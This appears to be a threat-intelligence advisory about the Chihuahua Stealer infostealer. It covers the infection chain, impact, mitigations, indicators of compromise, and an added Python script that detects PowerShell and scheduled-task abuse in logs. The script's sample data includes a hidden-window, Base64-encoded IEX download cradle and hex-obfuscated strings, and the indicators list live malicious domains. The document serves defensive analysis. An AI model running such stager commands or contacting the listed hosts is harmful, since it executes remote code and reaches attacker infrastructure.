
A New Breed of Infostealer

Severity: Medium
Published: Tue May 13 2025 (05/13/2025, 13:12:03 UTC)
Source: AlienVault OTX

Description

Chihuahua Stealer is a newly discovered .NET-based infostealer that combines common commodity-malware techniques with a few less usual features. The infection begins with an obfuscated PowerShell script shared via Google Drive, which kicks off a multi-stage payload chain. Persistence is achieved through scheduled tasks, and the main payload targets browser data and cryptocurrency wallet browser extensions. Stolen data is compressed, encrypted with AES-GCM through the Windows CNG (Cryptography Next Generation) APIs, and exfiltrated over HTTPS. Stealth techniques include multi-stage execution, Base64 encoding, hex-string obfuscation, and a cleanup routine that removes execution traces; each infected machine is tagged with a unique identifier so the operators can tell victims apart.

AI-Powered Analysis

Last updated: 06/19/2025, 17:34:19 UTC

Technical Analysis

Chihuahua Stealer is a newly identified .NET-based infostealer with a multi-stage infection chain and an encrypted exfiltration path. The initial vector is an obfuscated PowerShell script distributed via Google Drive, which downloads and runs further stages; splitting the chain into stages means no single artifact contains the full payload, which complicates static detection and sandbox analysis. Persistence is maintained through scheduled tasks, so the malware survives reboots and re-runs without user interaction.

The primary objective is credential and asset theft: the main payload harvests browser data (saved credentials, cookies, and autofill entries) and the data of cryptocurrency wallet browser extensions, which makes a compromised workstation a direct path to funds rather than only to accounts. Before exfiltration the collected data is compressed and encrypted with AES-GCM via the Windows Cryptography Next Generation (CNG) APIs, then sent to the command-and-control infrastructure over HTTPS. From the defender's side this matters in two ways: the TLS layer hides the traffic among ordinary web requests, and even with TLS inspection the inner AES-GCM layer prevents reconstructing what was stolen from a capture alone, so the scope of loss must be inferred from host artifacts instead.

To evade detection, the stealer uses Base64 encoding and hex-string obfuscation in its scripts and runs a cleanup routine that removes traces of its execution. Each infected machine is assigned a unique identifier, which lets the operators correlate uploads per victim. Scheduled-task persistence and Base64/hex obfuscation are standard commodity-malware tradecraft; the use of the native CNG APIs for authenticated encryption of the exfiltration payload, rather than a bundled or home-grown cipher, is the less common and more carefully engineered part.

Potential Impact

For European organizations, Chihuahua Stealer poses a significant threat primarily to entities whose employees or systems keep sensitive credentials in the browser or hold cryptocurrency assets. Theft of browser data can lead to unauthorized access to corporate accounts, email, and internal systems, and stolen session cookies in particular allow account takeover without the password and can bypass MFA until the session is revoked. The targeting of crypto wallet extensions is especially concerning for financial institutions, fintech companies, and enterprises involved in blockchain or cryptocurrency operations, since stolen wallet secrets translate into direct, usually irreversible financial losses. The stealth and persistence mechanisms raise the risk of prolonged undetected compromise, during which credentials keep being refreshed and re-collected. The use of Google Drive as the delivery channel abuses a trusted cloud service that is common in European workplaces, increasing the likelihood that links reach users and pass URL-reputation controls. Encrypted exfiltration over HTTPS complicates network-based detection and makes post-incident scoping from network captures impractical. Overall, the malware affects the confidentiality of sensitive data and, through account takeover, its integrity; the impact on availability is low, as the payload steals data rather than destroying it.

Mitigation Recommendations

European organizations should implement targeted defenses beyond generic controls:

1) Enhance email and cloud file-sharing security by deploying threat protection capable of detecting obfuscated PowerShell scripts and multi-stage payloads, including content reached through Google Drive shared links rather than only attachments.
2) Restrict unauthorized script execution with application control (AppLocker or WDAC) and PowerShell hardening: Constrained Language Mode is only enforced reliably when an application-control policy backs it, and PowerShell Script Block Logging (Event ID 4104) and Module Logging should be enabled and forwarded, since script-block logs record the decoded script text after Base64 and string obfuscation has been unwound.
3) Deploy endpoint detection and response (EDR) with behavioral analytics to identify persistence such as scheduled tasks created by script hosts (Security Event ID 4698 and the TaskScheduler operational log), PowerShell launched with hidden windows or encoded commands, and processes that read browser credential stores or wallet-extension data.
4) Monitor network traffic for anomalous HTTPS connections to unknown or newly registered domains, using the domains listed below as a starting point, and apply TLS inspection where privacy policies permit; note that the inner AES-GCM layer means inspection shows that data left, not what it contained.
5) Educate users on the risk of unsolicited links from cloud services and encourage verification of shared files with the sender through another channel.
6) Regularly audit browser extensions, particularly crypto wallet extensions, and enforce policies that limit installation to trusted sources and managed browser profiles.
7) Employ multi-factor authentication (MFA) on all critical accounts to limit the impact of credential theft, and on suspected compromise revoke active sessions and rotate credentials, since stolen cookies remain valid until the session is invalidated.
8) Maintain incident response plans tailored to data exfiltration scenarios (credential rotation, session revocation, wallet migration), alongside regular backups; backups do not undo a theft but support recovery of the affected host.

These measures collectively reduce the attack surface and improve detection and response capabilities against Chihuahua Stealer.
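To make recommendations 2 and 3 concrete, the following added example (my own code, not part of the G DATA write-up or the OTX pulse) triages PowerShell script-block events (Event ID 4104) and scheduled-task-creation events (Event ID 4698) for the traits described in the Technical Analysis: Base64-encoded commands, hex-string obfuscation, cloud-hosted download cradles, hidden windows, and tasks that run script hosts from user-writable paths. The indicator patterns, weights and threshold are my own assumptions, and every sample event, task name and path is constructed for illustration; none of them are Chihuahua Stealer artifacts.

```python
"""Triage Event 4104 (PowerShell script block) and Event 4698 (task created)
records for encoded commands, hex-string obfuscation, cloud download cradles
and scheduled-task persistence.  Added example; all samples are constructed."""
import base64
import re

# Detection patterns and weights are my own choice (assumption), one per trait;
# tune them against your own telemetry before relying on the verdict.
ENC_RE = re.compile(r"-(?:enc|encodedcommand|e|ec)\b\s+([A-Za-z0-9+/=]{20,})", re.I)
HEX_LIST_RE = re.compile(r"(?:0x[0-9a-f]{2}\s*,\s*){2,}0x[0-9a-f]{2}", re.I)
HEX_STR_RE = re.compile(r"['\"]([0-9a-f]{16,})['\"]", re.I)
INDICATORS = {  # name: (regex, weight)
    "encoded_command": (ENC_RE, 3),
    "hex_obfuscation": (re.compile(f"{HEX_LIST_RE.pattern}|{HEX_STR_RE.pattern}", re.I), 3),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b", re.I), 2),
    "google_drive": (re.compile(r"drive\.google\.com|docs\.google\.com", re.I), 2),
    "iex": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "base64_decode": (re.compile(r"FromBase64String", re.I), 1),
    "task_runs_script_host": (re.compile(r"\b(?:powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(?:\.exe)?\b", re.I), 2),
    "task_user_writable_path": (re.compile(r"\\(?:Users|ProgramData|Temp|AppData)\\", re.I), 2),
}
TASK_ONLY = {"task_runs_script_host", "task_user_writable_path"}  # only meaningful for 4698
SUSPICIOUS_SCORE = 4


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext behind a -EncodedCommand argument, or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_hex_strings(text):
    """Recover printable strings hidden as 0x.. byte lists or long quoted hex."""
    blobs = [bytes(int(b, 16) for b in re.findall(r"0x([0-9a-f]{2})", m.group(0), re.I))
             for m in HEX_LIST_RE.finditer(text)]
    blobs += [bytes.fromhex(m.group(1)) for m in HEX_STR_RE.finditer(text)
              if len(m.group(1)) % 2 == 0]
    return [s for s in (b.decode("latin-1") for b in blobs) if s.isprintable()]


def analyze_event(ev):
    """Score one event over the raw text plus every layer the decoders surface."""
    text = ev.get("script") or f"{ev.get('command', '')} {ev.get('arguments', '')}"
    decoded = decode_encoded_command(text)
    hidden = decode_hex_strings(text)
    layers = [text] + ([decoded] if decoded else []) + hidden
    hits = set()
    for name, (rx, _) in INDICATORS.items():
        if name in TASK_ONLY and ev["event_id"] != 4698:
            continue
        if any(rx.search(layer) for layer in layers):
            hits.add(name)
    score = sum(INDICATORS[n][1] for n in hits)
    return {"host": ev["host"], "event_id": ev["event_id"], "indicators": sorted(hits),
            "decoded": decoded, "hidden_strings": hidden, "score": score,
            "verdict": "suspicious" if score >= SUSPICIOUS_SCORE else "benign"}


def analyze_events(events):
    return [analyze_event(ev) for ev in events]


# Constructed sample telemetry (assumption: hosts, task names, paths and the
# stager URL are invented for the example, not taken from the real campaign).
STAGER = ("IEX (New-Object Net.WebClient).DownloadString("
          "'https://drive.google.com/uc?export=download&id=CONSTRUCTED')")
HEX_URL = "https://drive.google.com".encode().hex()
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "ws01",
     "script": "powershell.exe -NoP -w hidden -enc "
               + base64.b64encode(STAGER.encode("utf-16le")).decode()},
    {"event_id": 4104, "host": "ws01",
     "script": "$i=[char[]](0x49,0x45,0x58) -join '';"
               f"$u=('{HEX_URL}' -split '(..)' | ? {{$_}} | % {{[char][Convert]::ToInt32($_,16)}}) -join ''"},
    {"event_id": 4698, "host": "ws01", "task_name": "OneDriveSync",
     "command": "powershell.exe",
     "arguments": r"-NoP -w hidden -File C:\Users\Public\Libraries\sync.ps1"},
    {"event_id": 4104, "host": "ws02",
     "script": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"event_id": 4698, "host": "ws02", "task_name": "VendorUpdate",
     "command": r"C:\Program Files\Vendor\updater.exe", "arguments": "/silent"},
]

if __name__ == "__main__":
    for r in analyze_events(SAMPLE_EVENTS):
        print(f"{r['host']} {r['event_id']} {r['verdict']:10} score={r['score']:2} {r['indicators']}")
        if r["decoded"]:
            print("   decoded:", r["decoded"])
        if r["hidden_strings"]:
            print("   hidden :", r["hidden_strings"])
```

The point of scanning the decoded layers as well as the raw text is that the second sample never contains the strings "IEX" or "drive.google.com" in the log line itself; they only appear after the 0x byte list and the hex string are unwound, which is exactly what hex-string obfuscation is meant to prevent. In production, feed the analyzer from the forwarded 4104/4698 records rather than the embedded samples, and treat the score as a triage priority, not a verdict.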


Technical Details

Author
AlienVault
TLP
WHITE
References
https://www.gdatasoftware.com/blog/2025/05/38199-chihuahua-infostealer (G DATA blog: "Sit, Fetch, Steal - Chihuahua Stealer: A new Breed of Infostealer")
https://feeds.feedblitz.com/~/918192962/0/gdatasecurityblog-en~Sit-Fetch-Steal-Chihuahua-Stealer-A-new-Breed-of-Infostealer (feed copy of the same post)
https://www.gdatasoftware.com/fileadmin/_processed_/f/b/G_DATA_Blog_ChihuahuaStealer_Title_999cabe2bc.jpg (title image)
Adversary
(not attributed)
Indicators of Compromise

Hashes

Type    | Value
--------|-----------------------------------------------------------------
MD5     | cdfdc1fde47a5d2899cf09d4c01e00e9
SHA-1   | db1d4986391052ad620adef9eb0c181a8ace5c57
SHA-256 | afa819c9427731d716d4516f2943555f24ef13207f75134986ae0b67a0471b84
SHA-256 | c9bc4fdc899e4d82da9dd1f7a08b57ac62fc104f93f2597615b626725e12cae8

(Hash types are inferred from digest length; the pulse does not state them.)

URLs

Value
https://flowers.hold-me-finger.xyz/index2.php.
https://onedrive.office-note.com/res?a=c&b=&c=8f2669e5-01c0-4539-8d87-110513256828&s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiI4YTJlNmI1MDQ4M2E5MWYyODkz

(The second URL is truncated in the source; the first is listed with its trailing period exactly as published. Note that onedrive.office-note.com is a look-alike of a Microsoft service name, not a Microsoft domain.)

Domains

Value
cat-watches-site.xyz
cdn.findfakesnake.xyz
flowers.hold-me-finger.xyz
onedrive.office-note.com

Threat ID: 682c99307960f6956616ac70

Added to database: 5/20/2025, 3:01:04 PM

Last enriched: 6/19/2025, 5:34:19 PM

Last updated: 7/31/2025, 7:37:40 AM
